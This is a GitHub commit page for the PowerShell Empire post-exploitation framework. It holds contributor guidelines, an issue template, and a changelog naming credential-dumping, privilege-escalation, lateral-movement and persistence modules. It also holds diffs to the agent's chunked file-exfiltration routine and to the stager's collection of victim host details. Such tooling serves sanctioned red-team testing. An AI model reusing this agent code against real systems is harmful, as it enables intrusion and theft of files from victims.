Skip to content
This repository was archived by the owner on Jan 29, 2020. It is now read-only.

Commit e43fb94

Browse files
committed
correct conflict in changelog
2 parents 578f93f + 791071c commit e43fb94

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

69 files changed

+10792
-2378
lines changed

.github/CONTRIBUTING.md

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
# How To Contribute
2+
3+
Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
4+
5+
6+
## Creating Github Issues
7+
8+
Please first review the existing Empire issues to see if the error was resolved with a fix in the development branch or if we chose not to fix the error for some reason.
9+
10+
The more information you provide in a Github issue the easier it will be for us to track down and fix the problem:
11+
12+
* Please provide the version of Empire you are using.
13+
* Please provide the OS and Python versions that you are using.
14+
* Please describe the expected behavior and the encountered error.
15+
* The more detail the better!
16+
* Include any actions taken just prior to the error.
17+
* Please post a screenshot of the error, a link to a Pastebin dump of the error, or embedded text of the error.
18+
* Any additional information.
19+
20+
21+
## Submitting Modules
22+
23+
* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
24+
* Base modules on the template at [./modules/template.py](https://github.com/PowerShellEmpire/Empire/blob/dev/lib/modules/template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
25+
* Cite previous work in the **'Comments'** module section.
26+
* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
27+
* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
28+
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
29+
* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
30+
* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).

.github/ISSUE_TEMPLATE.md

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
## Empire Version
2+
3+
4+
## OS Information (Linux flavor, Python version)
5+
6+
7+
## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
8+
9+
10+
## Screenshot of error, embedded text output, or Pastebin link to the error
11+
12+
13+
## Any additional information

changelog

Lines changed: 55 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,58 @@
1+
============
2+
3/31/2015 - RELEASE 1.5
3+
============
4+
-Encompasses all changes since the 1.4 tagged release
5+
6+
17
3/31/2016
28
---------
9+
-Merge of Inveigh 1.1 update and privesc/tater
10+
-Updated of Invoke-Mimikatz.ps1 source
311
-Updated mimikatz dlls to version 2.1 alpha
412
-Included modification to suppress cmd.exe when spawned via PTH.
513

6-
1/17/2016
14+
3/30/2016
15+
---------
16+
-Added loading of external modules with 'load /path/modules/'
17+
18+
3/25/2016
19+
---------
20+
-RESTful API modifications
21+
-expanded agent/server epoch check to +/- 12 hours
22+
-stagers now run -sta
23+
24+
3/24/2016
25+
---------
26+
-RESTful API modifications
27+
28+
3/22/2016
29+
---------
30+
-added auth to RESTful API, additional API fixes
31+
32+
3/21/2016
33+
---------
34+
-start of RESTful API implementation
35+
36+
3/19/2016
37+
---------
38+
-PowerView.ps1 update and multiple related module additions
39+
-added github issue templates
40+
-added situational_awareness/network/powerview/get_gpo_computer
41+
42+
3/11/2016
43+
---------
44+
-added privesc/getsystem
45+
-bug fix for Invoke-PsExec and some x64 pointers
46+
47+
3/3/2016
48+
---------
49+
-first pass at stager retry interval
50+
-download chunking modified
51+
52+
2/17/2016
753
---------
854
- '--debug 2' now displays debug information to the console as well as the empire.debug file
55+
-added privesc/mcafee_sitelist
956

1057
1/15/2016
1158
---------
@@ -21,11 +68,13 @@
2168
----------
2269
-Corrected several bugs in how the workingHours window is handled in the agent
2370

71+
2472
============
2573
12/29/2015 - RELEASE 1.4
2674
============
2775
-Encompasses all changes since 1.3.1 tagged release
2876

77+
2978
12/29/2015
3079
----------
3180
-Added situational_awareness/network/powerview/find_managed_security_groups to integrate @stufus' new code
@@ -121,16 +170,19 @@
121170
---------
122171
-Fixed small bug in TASK_CMD_WAIT response parsing
123172

173+
124174
============
125175
10/30/2015 - RELEASE 1.3.1
126176
============
127177
-Updated reflectivepick dlls to fix bug in injection and dll payload injection
128178

179+
129180
============
130181
10/29/2015 - RELEASE 1.3
131182
============
132183
-Encompasses all changes since 1.2 tagged release
133184

185+
134186
10/26/2015
135187
----------
136188
-Fix for psinject bug due to lack of .NET 4.0 on target.
@@ -168,6 +220,7 @@
168220
--- Six new modules and WAR stager added, /sids option added to golden_ticket
169221
--- Fixed international locale bug with unicode text in agent.ps1
170222

223+
171224
8/29/2015
172225
---------
173226
-HMAC algorithm for packet comms upgraded to use SHA1 instead of MD5
@@ -215,6 +268,7 @@
215268
--- Ability for agents to die after certain number of failed checkins
216269
--- Added ability to easily remove "stale" agents
217270

271+
218272
8/15/2015
219273
---------
220274
-Added modules management/timestomp, trollsploit/process_killer, persistence/elevated/wmi, situational_awareness/network/smbscanner, lateral_movement/invoke_psexec

data/agent/agent.ps1

Lines changed: 41 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -668,12 +668,45 @@ function Invoke-Empire {
668668
}
669669
# file download
670670
elseif($type -eq 41){
671-
try{
672-
$path = Get-Childitem $data | %{$_.FullName}
673-
# read in and send 512kb chunks for as long as the file has more parts
671+
try {
672+
$ChunkSize = 512KB
673+
674+
$Parts = $Data.Split(" ")
675+
676+
if($Parts.Length -gt 1) {
677+
$Path = $Parts[0..($parts.length-2)] -join " "
678+
try {
679+
$ChunkSize = $Parts[-1]/1
680+
if($Parts[-1] -notlike "*b*") {
681+
# if MB/KB not specified, assume KB and adjust accordingly
682+
$ChunkSize = $ChunkSize * 1024
683+
}
684+
}
685+
catch {
686+
# if there's an error converting the last token, assume no
687+
# chunk size is specified and add the last token onto the path
688+
$Path += " $($Parts[-1])"
689+
}
690+
}
691+
else {
692+
$Path = $Data
693+
}
694+
695+
# hardcoded floor/ceiling limits
696+
if($ChunkSize -lt 64KB) {
697+
$ChunkSize = 64KB
698+
}
699+
elseif($ChunkSize -gt 8MB) {
700+
$ChunkSize = 8MB
701+
}
702+
703+
# resolve the complete path
704+
$Path = Get-Childitem $Path | %{$_.FullName}
705+
706+
# read in and send the specified chunk size back for as long as the file has more parts
674707
$Index = 0
675708
do{
676-
$EncodedPart = Get-FilePart -File "$path" -Index $Index
709+
$EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
677710

678711
if($EncodedPart){
679712
$data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
@@ -699,7 +732,7 @@ function Invoke-Empire {
699732

700733
Encode-Packet -type 40 -data "[*] File download of $path completed"
701734
}
702-
catch{
735+
catch {
703736
Encode-Packet -type 0 -data "file does not exist or cannot be accessed"
704737
}
705738
}
@@ -862,9 +895,10 @@ function Invoke-Empire {
862895
# calculate what the server's epoch should be based on the epoch diff
863896
# this is just done for the first packet in a queue
864897
$ServerEpoch = [int][double]::Parse((Get-Date(Get-Date).ToUniversalTime()-UFormat %s)) - $script:EpochDiff
865-
# if the epoch counter isn't within a +/- 10 minute range (600 seconds)
898+
899+
# if the epoch counter isn't within a +/- 12 hour range (43200 seconds)
866900
# skip processing this packet
867-
if ($counter -lt ($ServerEpoch-600) -or $counter -gt ($ServerEpoch+600)){
901+
if ($counter -lt ($ServerEpoch-43200) -or $counter -gt ($ServerEpoch+43200)){
868902
return
869903
}
870904

data/agent/stager.ps1

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,10 @@ function Start-Negotiate{
6767
$p=(gwmi Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress);
6868

6969
# check if the IP is a string or the [IPv4,IPv6] array
70-
$i+='|'+@{$true=$p[0];$false=$p}[$p.Length -lt 6];
70+
$ip = @{$true=$p[0];$false=$p}[$p.Length -lt 6];
71+
if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
72+
$i+="|$ip";
73+
7174
$i+='|'+(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
7275

7376
# detect if we're SYSTEM or otherwise high-integrity

0 commit comments

Comments
 (0)